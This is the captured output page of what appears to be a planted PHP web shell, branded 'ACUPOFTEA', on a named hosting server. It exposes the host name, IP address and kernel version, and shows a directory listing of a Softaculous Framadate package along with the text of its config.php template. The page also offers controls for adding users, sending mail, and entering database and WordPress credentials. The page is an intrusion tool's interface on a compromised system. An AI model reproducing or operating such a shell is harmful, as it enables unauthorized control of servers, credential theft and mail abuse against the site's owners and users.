System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
framadate
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.php
<?php /** * This software is governed by the CeCILL-B license. If a copy of this license * is not distributed with this file, you can obtain one at * http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.txt * * Authors of STUdS (initial project): Guilhem BORGHESI (borghesi@unistra.fr) and Raphaël DROZ * Authors of Framadate/OpenSondage: Framasoft (https://github.com/framasoft) * * ============================= * * Ce logiciel est régi par la licence CeCILL-B. Si une copie de cette licence * ne se trouve pas avec ce fichier vous pouvez l'obtenir sur * http://www.cecill.info/licences/Licence_CeCILL-B_V1-fr.txt * * Auteurs de STUdS (projet initial) : Guilhem BORGHESI (borghesi@unistra.fr) et Raphaël DROZ * Auteurs de Framadate/OpenSondage : Framasoft (https://github.com/framasoft) */ // Fully qualified domain name of your webserver. // If this is unset or empty, the servername is determined automatically. // You *have to set this* if you are running Framadate behind a reverse proxy. // const APP_URL = '<www.mydomain.fr>'; // Application name const NOMAPPLICATION = '[[site_name]]'; // Database administrator email const ADRESSEMAILADMIN = '[[admin_email]]'; // Email for automatic responses (you should set it to "no-reply") const ADRESSEMAILREPONSEAUTO = ''; // Database server name, leave empty to use a socket const DB_CONNECTION_STRING = 'mysql:host=[[softdbhost]];dbname=[[softdb]];port=3306'; // Database user const DB_USER= '[[softdbuser]]'; // Database password const DB_PASSWORD = '[[softdbpass]]'; // Table name prefix const TABLENAME_PREFIX = '[[dbprefix]]'; // Name of the table that stores migration script already executed const MIGRATION_TABLE = 'framadate_migration'; // Default Language const DEFAULT_LANGUAGE = 'en'; // List of supported languages, fake constant as arrays can be used as constants only in PHP >=5.6 $ALLOWED_LANGUAGES = [ 'fr' => 'Français', 'en' => 'English', 'oc' => 'Occitan', 'es' => 'Español', 'de' => 'Deutsch', 'nl' => 'Dutch', 'it' => 'Italiano', 'br' => 'Brezhoneg', 'ca' => 'Català', ]; // Path to image file with the title const IMAGE_TITRE = 'images/logo-framadate.png'; // Clean URLs, boolean const URL_PROPRE = true; // Use REMOTE_USER data provided by web server const USE_REMOTE_USER = true; // Path to the log file const LOG_FILE = 'admin/stdout.log'; // Days (after expiration date) before purging a poll const PURGE_DELAY = 60; // Max slots per poll const MAX_SLOTS_PER_POLL = 366; // Number of seconds before we allow to resend an "Remember Edit Link" email. const TIME_EDIT_LINK_EMAIL = 60; // Config $config = [ /* general config */ 'use_smtp' => [[use_smtp]], // use email for polls creation/modification/responses notification 'smtp_options' => [ 'host' => '[[smtp]]', // SMTP server (you could add many servers (main and backup for example) : use ";" like separator 'auth' => [[auth_enable]], // Enable SMTP authentication 'username' => '[[smtp_username]]', // SMTP username 'password' => '[[smtp_password]]', // SMTP password 'secure' => '[[smtp_conn_prefix]]', // Enable encryption (false, tls or ssl) 'port' => [[smtp_port]], // TCP port to connect to ], /* home */ 'show_what_is_that' => true, // display "how to use" section 'show_the_software' => true, // display technical information about the software 'show_cultivate_your_garden' => true, // display "development and administration" information /* create_classic_poll.php / create_date_poll.php */ 'default_poll_duration' => 180, // default values for the new poll duration (number of days). /* create_classic_poll.php */ 'user_can_add_img_or_link' => true, // user can add link or URL when creating his poll. 'markdown_editor_by_default' => true, // The markdown editor for the description is enabled by default 'provide_fork_awesome' => true, // Whether the build-in fork-awesome should be provided ];
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
php53
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
php56
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
php71
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
php81
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
php82
DIR
-
drwxr-xr-x
2024-06-25 09:47:49
.htaccess
text/plain
104 B
-rw-r--r--
2021-12-23 06:54:36
.htpasswd
text/plain
34 B
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
4.38 KB
-rw-r--r--
2024-05-02 07:08:30
config.php
text/x-php
4.1 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
3.7 KB
-rw-r--r--
2024-05-02 07:08:30
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
8.8 KB
-rw-r--r--
2024-05-02 07:08:30
fileindex.php
text/plain
572 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.2 KB
-rw-r--r--
2024-05-02 07:08:30
info.xml
text/html
2.28 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
4.77 KB
-rw-r--r--
2024-05-02 07:08:30
install.xml
text/html
1.95 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
4.11 KB
-rw-r--r--
2024-05-02 07:08:30
notes.txt
text/plain
889 B
-rw-r--r--
2021-12-23 06:54:36
update_pass.php
text/x-php
496 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com